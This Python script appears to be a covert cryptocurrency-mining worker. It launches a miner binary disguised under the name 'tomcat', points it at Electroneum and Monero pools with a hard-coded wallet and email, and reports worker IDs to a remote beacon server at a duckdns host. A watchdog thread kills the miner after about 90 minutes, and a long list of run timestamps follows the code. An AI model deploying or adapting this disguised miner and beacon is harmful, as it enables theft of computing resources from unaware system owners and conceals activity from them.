import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:28:03.623284
#2018-02-17 17:15:04.520451
#2018-02-17 19:03:04.841977
#2018-02-17 20:52:04.637115
#2018-02-17 22:39:01.802250
#2018-02-18 00:23:01.611891
#2018-02-18 02:13:06.714319
#2018-02-18 04:02:01.366225
#2018-02-18 05:53:01.951745
#2018-02-18 07:44:07.076051
#2018-02-18 09:33:01.524829
#2018-02-18 11:19:04.211015
#2018-02-18 13:04:07.244315
#2018-02-18 14:53:07.483390
#2018-02-18 16:41:04.317925
#2018-02-18 18:30:04.778685
#2018-02-18 20:18:05.614602
#2018-02-18 22:03:04.720467
#2018-02-18 23:52:05.187196
#2018-02-19 01:38:04.483079
#2018-02-19 03:26:06.542268
#2018-02-19 05:11:06.375608
#2018-02-19 06:58:01.327829
#2018-02-19 08:46:06.248696
#2018-02-19 10:37:07.049510
#2018-02-19 12:24:01.232619
#2018-02-19 14:11:07.262069
#2018-02-19 16:01:04.211498
#2018-02-19 17:49:09.576160
#2018-02-19 19:36:08.698410
#2018-02-19 21:25:09.307837
#2018-02-19 23:11:04.527104
#2018-02-20 00:55:07.942970
#2018-02-20 02:44:06.633692
#2018-02-20 04:33:04.394675
#2018-02-20 06:17:06.965626
#2018-02-20 08:02:01.450343
#2018-02-20 09:47:08.515649
#2018-02-20 11:31:09.642470
#2018-02-20 13:17:07.652490
#2018-02-20 15:02:01.879196
#2018-02-20 16:47:09.669635
#2018-02-20 18:35:08.024251
#2018-02-20 20:27:04.789127
#2018-02-20 22:13:03.792441
#2018-02-20 23:54:07.600562
#2018-02-21 01:40:09.643216
#2018-02-21 03:29:07.797277
#2018-02-21 05:17:03.927580
#2018-02-21 07:05:09.180711
#2018-02-21 08:50:07.913977
#2018-02-21 10:38:01.598481
#2018-02-21 12:25:05.082962
#2018-02-21 14:13:06.537899
#2018-02-21 16:01:10.526460
#2018-02-21 17:52:11.801702
#2018-02-21 19:39:07.857216
#2018-02-21 21:26:04.222918
#2018-02-21 23:13:01.486806
#2018-02-22 01:02:07.583573
#2018-02-22 02:49:05.443819
#2018-02-22 04:36:01.922231
#2018-02-22 06:21:05.317604
#2018-02-22 08:08:07.753797
#2018-02-22 09:57:04.380869
#2018-02-22 11:44:01.867668
#2018-02-22 13:29:04.480205
#2018-02-22 15:17:06.376766
#2018-02-22 17:03:05.324595
#2018-02-22 18:51:08.348408
#2018-02-22 20:43:01.598883
#2018-02-22 22:29:07.436290
#2018-02-23 00:15:07.249605
#2018-02-23 02:03:05.750751
#2018-02-23 03:51:07.783724
#2018-02-23 05:43:08.242936
#2018-02-23 07:28:07.460885
#2018-02-23 09:32:05.726593
#2018-02-23 11:38:01.855952
#2018-02-23 13:29:10.510404
#2018-02-23 15:16:08.106120
#2018-02-23 17:04:05.830540
#2018-02-23 18:53:07.704737
#2018-02-23 20:41:04.412508
#2018-02-23 22:27:05.710508
#2018-02-24 00:11:07.069157
#2018-02-24 02:03:05.158726
#2018-02-24 03:54:01.927115
#2018-02-24 05:42:05.221056
#2018-02-24 07:32:06.682013
#2018-02-24 09:18:07.158945
#2018-02-24 11:13:07.094925
#2018-02-24 13:02:03.946091
#2018-02-24 14:50:02.992837
#2018-02-24 16:42:04.648408
#2018-02-24 18:31:04.122908
#2018-02-24 20:17:03.163067
#2018-02-24 22:10:07.569504
#2018-02-25 02:29:07.071335
#2018-02-25 06:10:06.492238
#2018-02-25 11:39:04.424214